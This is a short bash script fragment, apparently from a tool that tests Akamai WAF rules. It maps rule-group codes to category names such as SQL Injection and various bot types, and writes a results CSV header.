ACRONYMA=('man' 'atg' 'bms' 'bmp' 'krs-cmd' 'krs-xss' 'krs-dos' 'krs-iht' 'krs-php' 'krs-rfi' 'krs-sql' 'krs-trj' 'aag-wat' 'aag-wpr' 'aag-sql' 'aag-xss' 'aag-lfi' 'aag-rfi' 'aag-cmi' 'aag-wpl' 'penalty' 'aka-arb' 'aka-asc' 'aka-bib' 'aka-eco' 'aka-eag' 'aka-fia' 'aka-fis' 'aka-job' 'aka-mda' 'aka-new' 'aka-onl' 'aka-rss' 'aka-seo' 'aka-sit' 'aka-soc' 'aka-war' 'aka-wse' 'tra-ikb' 'tra-dvf' 'tra-htl' 'tra-wsl' 'tra-osc' 'tra-hbt' 'tra-dcb' 'tra-agc' 'tra-req' 'act-cok')
ACRONYMB=('Manual' 'Attack Group' 'Bot Manager Standard' 'Bot Manager Premier' 'Command Injection' 'Cross-Site Scripting' 'DDOS' 'Invalid HTTP' 'PHP Injection' 'Remote File Inclusion' 'SQL Injection' 'Trojan' 'Web Attack Tool' 'Web Protocol Attack' 'SQL Injection' 'Cross-Site Scripting' 'Local File Inclusion' 'Remote File Inclusion' 'Command Injection' 'Web Platform Attack' 'Penalty Box' 'Academic or Research Bots' 'Automated Shopping Cart and Sniper Bots' 'Business Intelligence Bots' 'E-Commerce Search Engine Bots' 'Enterprise Data Aggregator Bots' 'Financial Account Aggregator Bots' 'Financial Services Bots' 'Job Search Engine Bots' 'Media or Entertainment Search Bots' 'News Aggregator Bots' 'Online Advertising Bots' 'RSS Feed Reader Bots' 'SEO Analytics or Marketing Bots' 'Site Monitoring and Web Development Bots' 'Social Media or Blog Bots' 'Web Archiver Bots' 'Web Search Engine Bots' 'Impersonators of Known Bots' 'Development Frameworks' 'HTTP Libraries' 'Web Services Libraries' 'Open Source Crawlers/Scraping Platforms' 'Headless Browsers/Automation Tools' 'Declared Bots (Keyword Match)' 'Aggressive Web Crawlers' 'Request Anomaly' 'Cookie Integrity Failed' 'Cookie Integrity Failed')
if [ $verbose -eq 1 ]; then echo -e "> exporting $(basename ${filecnf})_${filetim}.csv"; fi
echo "Environment,HTTP Code,Checker reference,Akamai reference,Type,Payload,URL" > "$(basename ${filecnf})_${filetim}.csv"
fi
readconfig $filecnf $property
Reference in New Issue View Git Blame Copy Permalink